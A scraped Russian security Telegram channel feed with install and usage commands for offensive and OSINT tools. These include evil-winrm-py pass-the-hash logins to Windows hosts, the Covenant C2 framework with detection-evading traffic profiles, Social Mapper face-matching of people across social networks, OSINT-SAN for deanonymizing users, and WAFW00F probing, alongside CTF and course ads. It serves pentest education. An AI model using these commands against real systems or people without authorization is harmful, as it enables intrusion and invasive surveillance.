- Автодополнение локальных и удаленных путей (включая пути с пробелами)

👉Расширенное взаимодействие с PowerShell
- Загрузка функций из локальных PS1-скриптов в сессию
- Выполнение локальных PowerShell-сценариев на удаленном узле
- Загрузка DLL-библиотек в память удаленного процесса PowerShell
- Выполнение EXE-файлов, загружаемых непосредственно в память

⬇️Установка
sudo apt install evil-winrm-py
Проверка

evil-winrm-py -h


Базовое подключение с аутентификацией по паролю
evil-winrm-py -i 192.168.1.100 -u Administrator -p P@ssw0rd


Подключение через SSL с использованием Pass-the-Hash

evil-winrm-py -i dc01.domain.local -u Administrator -H 8843f4f67bcc0c6e6b5c6d7e8f9a0b1c --ssl


Аутентификация с применением сертификатов
evil-winrm-py -i 10.10.10.50 -u user@domain.local --priv-key-pem ./key.pem --cert-pem ./cert.pem

Kerberos-аутентификация с кастомным SPN

evil-winrm-py -i srv02.domain.local -u user@DOMAIN.LOCAL -k --spn-prefix WSMAN --spn-hostname srv02.domain.local

Администрирование серверной инфраструктуры
evil-winrm-py -i srv01.corp.local -u CORP\admin -p P@ssw0rd --ssl
Обеспечивает безопасное удаленное управление серверами Windows с шифрованием трафика. Используется для выполнения регламентных задач, диагностики и мониторинга состояния систем.

Тестирование на проникновение (авторизованное)

evil-winrm-py -i 10.0.0.25 -u Administrator -H 8843f4f67bcc0c6e6b5c6d7e8f9a0b1c

Позволяет проверить устойчивость инфраструктуры к атакам Pass-the-Hash, оценить эффективность политик паролей и корректность конфигурации WinRM

🎇Ограничения и требования
- Необходимость явного разрешения на использование
- Требуется активированный WinRM на целевой системе
- Kerberos-аутентификация требует дополнительной настройки на стороне клиента
- SSL-сертификаты должны быть доверенными или принятыми вручную

#evilwinrmpy #tool #pentest #NTLM #PowerShell #Kerberous

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

BPF Linker: Инструмент статической линковки для современных BPF-программ

BPF Linker (bpf-linker) — специализированное решение для статической линковки объектных файлов BPF-программ, разработанное в рамках экосистемы Aya. Инструмент ориентирован на упрощение сборки современных BPF-приложений при сохранении совместимости с устаревшими, более ограничивающими версиями ядра.


В отличие от традиционных линкеров, bpf-linker оперирует не машинным кодом, а LLVM-биткодом. Это позволяет выполнять оптимизацию на уровне промежуточного представления и генерировать эффективный байт-код для виртуальной машины BPF.
Инструмент принимает на вход:
▶️Файлы биткода (.bc)
LLVM IR (.ll)
▶️Объектные файлы со встроенным биткодом (.o)
▶️Статические библиотеки (.a)
▶️На выходе формируется готовый объектный файл BPF, который может быть загружен в ядро

⬇️Установка
sudo apt install bpf-linker

Проверка
bpf-linker -h


⏺️Оптимизация для устаревших ядер (v1/v2)
bpf-linker --cpu v2 --unroll-loops --ignore-inline-never -o legacy.o *.o

Объектный файл legacy.o, совместимый с ядрами 4.x–5.x. Принудительное встраивание функций и развертка циклов позволяют выполнять сложную логику там, где отсутствует поддержка вызовов функций и циклов.

⏺️Отладка и анализ
bpf-linker --dump-module ./final.ll --log-level debug --log-file ./link.log -o output.o input.o

Команда выполняет линковку входного файла input.o в output.o, сохраняя детальный лог в link.log и финальное LLVM-представление в final.ll. Флаг --log-level debug обеспечивает максимальную детализацию, --dump-module — анализ промежуточного кода. Позволяет диагностировать ошибки линковки, проверять корректность оптимизаций и исследовать генерируемый BPF-код.

⏺️Минимизация размера
bpf-linker -O z --disable-memory-builtins -o minimal.o *.o

Данная команда выполняет линковку всех объектных файлов с агрессивной оптимизацией по размеру (-O z) и отключением экспорта встроенных функций работы с памятью (--disable-memory-builtins). Результирующий файл minimal.o имеет минимально возможный размер. Критически важно для систем с жесткими лимитами на размер загружаемых BPF-программ.

👉Преимущества инструмента
- Полноценная статическая линковка для BPF-модулей
- Поддержка CO-RE через BTF-генерацию
- Обратная совместимость с ограничениями старых ядер

#bpflinker #tool #pentest #LLVM

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🌍 Категория ВебПОСТимся
——————————————

🗂 В архив добавлены задания + райтапы:

🔵Разное - В поисках флага
🔵Pentest Machines - Тревожный сигнал

Приятного хакинга!

Читать полностью…

Codeby

Как усилить свою позицию на рынке ИБ в 2026? Академия Кодебай предлагает системный подход с поддержкой экспертов!

Если вы планируете развиваться в ИБ или углубить текущую специализацию, сейчас открыты наборы по направлениям:

⏺️ DevSecOps-инженер
⏺️ DFIR (цифровая криминалистика и реагирование на инциденты Linux)
⏺️ Реверсивный инжиниринг (Windows и базовый курс)
⏺️ Основы информационной безопасности
⏺️ AppSec инженер
⏺️ Профессия Пентестер
⏺️ Анализ защищенности Android-приложений

Формат — практическое обучение с фокусом на инженерные навыки:

CI/CD и безопасность инфраструктуры, анализ инцидентов, работа с артефактами, исследование ПО без исходников, SAST/DAST, тестирование на проникновение, мобильная безопасность.


Ближайшие старты: 9 и 16 февраля.
По части программ можно присоединиться к текущей группе.

Трудности с выбором? Мы готовы подобрать карьерный трек под ваши цели. Пишите @CodebyAcademyBot и получите бесплатную консультацию.

Посмотрите программу и даты стартов:
▶️https://codeby.academy/codeby-courses-fixed.html

Читать полностью…

Codeby

Тем временем у нас взят first blood на про-лабе Mr.Robot 👀

Это цепочка из 3 взаимосвязанных машин с вайбом одноимённого сериала: от первой веб-зацепки переходим к скрытым сервисам, внутренней сети и нестандартным протоколам

Если хочется пройти цепочку самому — лаборатория тут: hackerlab.pro/labs/mrrobot

Читать полностью…

Codeby

🗺 Social Mapper

Инструмент с открытым исходным кодом, который использует технологию распознавания лиц для сопоставления профилей в социальных сетях на разных платформах. Автоматически ищет в указываемых социальных сетях имена и фотографии целей для точного определения и группировки профилей. По результатам работы генерирует отчет.


Поддерживает поиск в следующих социальных сетях:
⏺️LinkedIn;
⏺️Facebook;
⏺️Pinterest;
⏺️Twitter;
⏺️Google Plus;
⏺️Instagram;
⏺️ВКонтакте;
⏺️Weibo;
⏺️Douban.

Установка
1️⃣Для работы требуется предварительная установка Firefox.
sudo add-apt-repository ppa:mozillateam/firefox-next && sudo apt update && sudo apt upgrade


2️⃣Установить Geckodriver для и убедиться, что он находится в переменной PATH.

3️⃣Далее необходимы следующие компоненты:
sudo apt-get install build-essential cmake
sudo apt-get install libgtk-3-dev
sudo apt-get install libboost-all-dev


4️⃣Клонирование репозитория и установка зависимостей:
git clone https://github.com/Greenwolf/social_mapper
cd social_mapper/setup
python3 -m pip install --no-cache-dir -r requirements.txt


5️⃣Завершающим шагом необходимо в браузере для каждой социальной сети войти в профиль и сохранить страницы со статусом "trust this browser" или "unknown browser".

➡️Использование
Для запуска инструмента необходимо указать 4 параметра: формат ввода, входной файл или папку и основной режим работы:
-f, --format - форматы вида name, csv, imagefolder, socialmapper;
-i, --input - название компании, файл CSV, папка с изображениями или HTML-файл;
-m, --mode - fast или accurate позволяет выбрать пропуск потенциальных целей после нахождения первого вероятного совпадения, что в некоторых случаях может многократно ускорить работу программы

💻Примеры
Быстрая проверка в Facebook и Twitter некоторых целей, которые хранятся в папке с изображениями:
python3 social_mapper.py -f imagefolder -i ./Input-Examples/imagefolder/ -m fast -fb -tw


Проверка компании Evil Corp LLC, где количество ложных срабатываний должно быть сведено к минимуму:
python3 social_mapper.py -f company -i "Evil Corp LLC" -m accurate -a -t strict


#osint #tool #search

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

☁️ Covenant — .NET C2‑фреймворк для пост-эксплуатаци

Covenant — кросс-платформенный C2 на ASP.NET Core с веб‑панелью, много‑пользовательским режимом и поддержкой «Grunt»‑имплантов для управления скомпрометированными хостами в корпоративных сетях.


⛓️‍💥 Основные возможности Covenant
📉 Интуитивный web‑интерфейс: управление слушателями, имплантами (Grunts), задачами, файлами и отчётами прямо из браузера, с поддержкой нескольких операторов одновременно.
📉 Мульти-платформенность и Docker: сервер на .NET Core можно запускать на Linux, Windows и macOS, а также в Docker‑контейнере, что удобно для lab‑окружений и изолированных C2‑хостов.
🖱 Listener Profiles: профили слушателей позволяют кастомизировать HTTP(S)/Network‑трафик, маскируя его под легитимные запросы и упрощая обход детекта.

🧠 Импланты Grunt и криптография
⏺️ Grunt — это .NET‑имплант, который периодически коннектится к слушателю, получает команды, исполняет их и отправляет результаты, поддерживая типичные C2‑операции (команды, файлы, модульные задачи).
⏺️ Реализован защищённый обмен ключами + опциональный SSL, что обеспечивает forward secrecy и защищает трафик от пассивного прослушивания.
⏺️ Dynamic Compilation: каждое новое задание или Grunt компилируются «на лету» через Roslyn и обфусцируются ConfuserEx, что снижает количество полностью статичных сигнатурных пейлоадов.

⬇️ Установка и запуск
1️⃣ Быстрый старт через .NET / git
▶️ Клонировать репозиторий и собрать приложение:
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run


▶️ Затем открыть панель по адресу вида https://127.0.0.1:7443/, создать учётку оператора и перейти к настройке Listener/Launcher/Grunt.

2️⃣ Запуск через Docker
▶️ Использовать готовый Docker‑образ и пробросить порты + volume для хранения данных:
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant


▶️ После старта сервер работает как обычный C2‑бэкенд, доступный по HTTPS для всей команды.

#c2 #dotnet #redteam #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

🤖 Как выявлять и предотвращать утечки информации по сетевым скрытым каналам

Команда HEX.TEAM приглашает на открытый профессиональный вебинар «Противодействие утечке информации по сетевым скрытым каналам» — с разбором теории, практики и реальных кейсов из проектов.

О чём поговорим:

• как строятся классические и современные сетевые скрытые каналы в различных сетевых протоколах

• как определить, является ли угроза утечки информации по сетевым скрытым каналам реальной для вашей организации

• как выстраивается система защиты от подобных утечек

📅 Дата: 18/02/2026
🕓 Время: 16:00
💻 Онлайн, участие бесплатное

Спикер:
Михаил Финошин
руководитель отдела исследований ИБ HEX.TEAM
старший преподаватель кафедры «Криптология и кибербезопасность» НИЯУ МИФИ
автор более 15 научных публикаций по информационной безопасности

Количество мест ограничено.
👉 Регистрация на вебинар 👈

Подписывайтесь на канал HEX.TEAM - здесь мы регулярно делимся практикой, кейсами и инженерным взглядом на информационную безопасность.

Реклама. Erid: 2VtzqvmkHqd

Читать полностью…

Codeby

WAFW00F: Технологический инструмент для идентификации веб-приложений межсетевых экранов

WAFW00F - инструмент с открытым исходным кодом, разработанный для точного определения и классификации (снятия отпечатков) продуктов Web Application Firewall (WAF), защищающих веб-сайт. Поддержкой и развитием проекта занимается компания EnableSecurity. Этот инструмент является стандартным в арсенале специалистов по кибербезопасности, пентестеров и администраторов, позволяя им проанализировать безопасностный периметр целевого приложения.


👉WAFW00F использует трехуровневый подход для определения WAF:
▶️Пассивный анализ - отправляет обычный HTTP-запрос и ищет сигнатуры в заголовках (например, X-Protected-By, Server), cookies или HTML-коде. Многие WAF оставляют уникальные следы
▶️Активное тестирование - если пассивный анализ не сработал, отправляет подозрительные запросы (инъекции SQL, XSS). Анализирует ответы на блокировку (специальные страницы ошибок, коды состояния (403, 406) или заголовки)
▶️Эвристический анализ - если первые два шага не дали результата, применяет алгоритмы к собранным ответам, чтобы определить, реагирует ли система безопасности на зондирование.
База сигнатур включает более
150 WAF (Cloudflare, Imperva Incapsula, F5 BIG-IP, Fortinet, ModSecurity, AWS, Google Cloud, Microsoft Azure и другие)
.


⬇️Установка
pipх install wafw00f

Проверка
wafw00f -h


⏺️Базовая проверка
wafw00f https://example.org

При успешном обнаружении вывод будет содержать информацию о производителе и модели WAF.

⏺️Просмотр полного списка детектируемых систем защиты
wafw00f -l

Эта команда выводит обширную таблицу с именами WAF и их производителями, что полезно для ознакомления с возможностями инструмента.

⏺️Проверка нескольких целей и вывод в файл
wafw00f https://site1.com http://site2.net -o results.json

Флаг -o (или --output) позволяет экспортировать результаты в файл. Формат (JSON, CSV, plain text) определяется по расширению файла (.json, .csv, .txt).

⏺️Агрессивное тестирование для выявления всех возможных WAF
wafw00f https://target.com -a -v

Ключ -a (--findall) заставляет инструмент продолжить тестирование даже после первого успешного совпадения, чтобы найти все возможные WAF. Флаг -v увеличивает детализацию вывода.

#WAFW00F #tool #pentest #WAF

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🎢 Категория РазноеDrakosha Ali

🔎 Категория OSINTСпецслужбы

Приятного хакинга!

Читать полностью…

Codeby

OSINT-SAP Project

Бесплатный OSINT-SAN Framework дает возможность быстро находить информацию и деанонимизировать пользователей сети интернет. С помощью нашего ПО вы сможете собирать информацию о пользователях как при использовании linux.

📕Характиристика:
1️⃣Сканирование и вывод информации IP и доменных адресов (Whois, shodan, DNS lookup, TCP port scan)
2️⃣Сбор информации о мобильном номере
3️⃣Создание рандомной сетевой личности
4️⃣Поиск по никнейму
5️⃣Поиск по bitcoin кошельку

💻Установка:

git clone https://github.com/Bafomet666/OSINT-SAN.git

cd OSINT-SAN/

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 osintsan.py


#tools #osint

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Что такое фишинговые ссылки и как они работают?

"Я же не кликаю на спам"— думаем мы, читая очередной пост о кибербезопасности. Такая уверенность, что фишинг обойдет нас стороной, стала его главным преимуществом. Мошенники постоянно оттачивают свои методы, а фишинговые ловушки становятся все изощреннее. Именно на автоматизм и миг невнимательности они и рассчитывают, создавая идеальные копии сайтов и писем.

Рассказываем, в чем суть фишинга, как проводится эта атака и почему ее жертвами становятся даже опытные пользователи.

➡️ В статье вы найдете рекомендации, как не попасться на мошенническую схему, и четкий план действий на случай, если вы уже оказались в ловушке.

#Фишинг #Инфобезопасность #БезопасностьАккаунтов

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…
Subscribe to a channel